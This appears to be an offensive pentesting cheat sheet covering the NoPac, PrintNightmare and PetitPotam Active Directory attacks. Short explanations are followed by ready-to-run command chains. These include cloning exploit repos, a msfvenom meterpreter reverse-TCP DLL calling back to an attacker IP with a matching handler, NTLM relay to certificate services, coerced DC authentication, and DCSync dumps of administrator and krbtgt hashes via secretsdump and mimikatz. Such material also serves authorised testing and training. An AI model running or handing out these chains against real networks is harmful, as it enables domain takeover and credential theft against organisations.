Bleeding Edge Vulnerabilities
NoPac (SamAccountName Spoofing)
NoPac (SamAccountName Spoofing) is a privilege escalation attack that exploits vulnerabilities (CVE-2021-42287 and CVE-2021-42278) in Active Directory. It allows an attacker with low privileges to impersonate a domain administrator by abusing the way Active Directory handles Kerberos service tickets (TGT and ST).
By combining these flaws, an attacker can:
- Rename a machine account to match an existing domain admin account.
- Request a Kerberos TGT that AD incorrectly associates with the real admin.
- Use the forged TGT to gain domain admin access.
This attack bypasses normal privilege escalation defenses, making it critical to patch affected systems.
git clone https://github.com/Ridter/noPac.git
cd noPac
## Scanning for NoPac
sudo python3 scanner.py rezydev.local/jethalal:Coolpass123@ -dc-ip 10.10.10.10 -use-ldap
## Shell & Impersonating
sudo python3 noPac.py REZYDEV.LOCAL/jethalal:Coolpass123@ -dc-ip 10.10.10.10 -dc-host <DC-HOSTNAME> -shell --impersonate administrator -use-ldap
## DCSync
sudo python3 noPac.py REZYDEV.LOCAL/jethalal:Coolpass123@ -dc-ip 10.10.10.10 -dc-host <DC-HOSTNAME> --impersonate administrator -use-ldap -dump -just-dc-user REZYDEV/administrator
info
Shell is established with the target using smbexec.py. This is semi-interactive shell session.
.ccachefile is saved in current directory (where we rannoPac.pytool)
PrintNightmare (remotely)
PrintNightmare is a critical Windows vulnerability (CVE-2021-34527) in the Windows Print Spooler service that allows remote code execution (RCE) and local privilege escalation (LPE).
How it Works:
- The Print Spooler service improperly handles printer driver installation via Point and Print.
- Attackers can exploit this by tricking Windows into installing a malicious driver.
- This gives them SYSTEM privileges, allowing full control over the target machine.
Impact:
- Can be exploited remotely or locally.
- Used for privilege escalation to gain admin rights.
- Enables remote takeover of domain controllers.
# Clone Exploit Repo
git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675
# Install cube0x0's Version of Impacket [MUST]
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
# Enumerate MS-RPRN
python3 rpcdump.py @10.10.10.10 | egrep 'MS-RPRN|MS-PAR'
# Generating a DLL Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=8080 -f dll > file.dll
# Creating a Share with smbserver.py to host .dll file
sudo smbserver.py -smb2support REZYDEV /path/to/file.dll
# Configuring & Starting MSF multi/handler
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.10.5; set LPORT 8080; run"
# Run The Exploit
sudo python3 CVE-2021-1675.py rezydev.local/jethalal:'Coolpass123@'@10.10.10.10 '\\10.10.10.5\REZYDEV\file.dll'
PetitPotam (MS-EFSRPC)
PetitPotam (CVE-2021-36942) is a NTLM relay attack that abuses the MS-EFSRPC (Encrypting File System Remote Protocol) to force a Windows server or domain controller to authenticate to an attacker's machine using NTLM.
How It Works:
- The attacker sends EFSRPC requests to a Windows system.
- The target system authenticates to the attacker's machine over NTLM.
- The attacker relays this NTLM authentication to another service (e.g., Active Directory Certificate Services).
- This can lead to privilege escalation or domain compromise (e.g., issuing admin certificates).
Impact:
- Can be used to take over a domain if combined with an NTLM relay attack.
- Works even if SMB signing is enabled.
- Often exploited with ADCS (Active Directory Certificate Services) misconfigurations.
# Start ntlmrelayx.py
python3 ntlmrelayx.py -debug -smb2support --target http://CA01.REZYDEV.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController
## Note: We can either use KerberosAuthentication or DomainController ADCS template.
## Web Enrollment URL for the CA host is also needed.
# Using Certi to Locate the CA
certi find -dc-ip 10.10.10.10 -u rezydev -p Coolpass123@
# Using CrackmapExec to Locate the CA
crackmapexec ldap 10.10.10.10 -u rezydev -p Coolpass123@ --kdcHost <DC_Hostname> --ads
# Using BloodHound to Locate the CA
sharpHound.exe --collectionmethods ACL,DCOnly,Certipy
# Using LDAP Queries (PowerShell) to Locate the CA
Get-ADObject -Filter 'objectclass -eq "pKIEnrollmentService"' -Properties dnsHostName, cn
python3 PetitPotam.py 10.10.10.5 10.10.10.10 # Force DC to auth to Attacker
## OR IF WINDOWS-ATTACK-HOST USE MIMIKATZ INSTEAD
misc::efs /server:10.10.10.10 /connect:10.10.10.5
Now, We get base64 encoded certificate for the DC.
# Requesting a TGT Using gettgtpkinit.py
python3 gettgtpkinit.py REZYDEV.LOCAL/DC01\$ -pfx-base64 <BASE64-ENCODED-CERT> dc01.ccache
# Setting the KRB5CCNAME Environment Variable
export KRB5CCNAME=dc01.ccache
# Using Domain Controller TGT to DCSync
python3 secretsdump.py -just-dc-user REZYDEV/administrator -k -no-pass DC01.REZYDEV.LOCAL
# Submitting a TGS Request for Ourselves Using getnthash.py
python getnthash.py -key <KEY> REZYDEV.LOCAL/DC01$
# Key is 'minikerberos INFO' from gettgtpkinit.py output from above code block
# It will recover a NT Hash, and we can use that hash to DCSync
python3 secretsdump.py -just-dc-user REZYDEV/administrator "DC01$"@10.10.10.10 -hashes <HASH>:<HASH>
# We could directly use base64 certificate to request TGT and perform PTT
.\Rubeus.exe asktgt /user:DC01$ /certificate:<BASE64-CERT> /ptt
# Confirm ticket is in the memory using 'klist'
# Perform DCSync using Mimikatz
.\mimikatz.exe
mimikatz> lsadump::dcsync /user:rezydev\krbtgt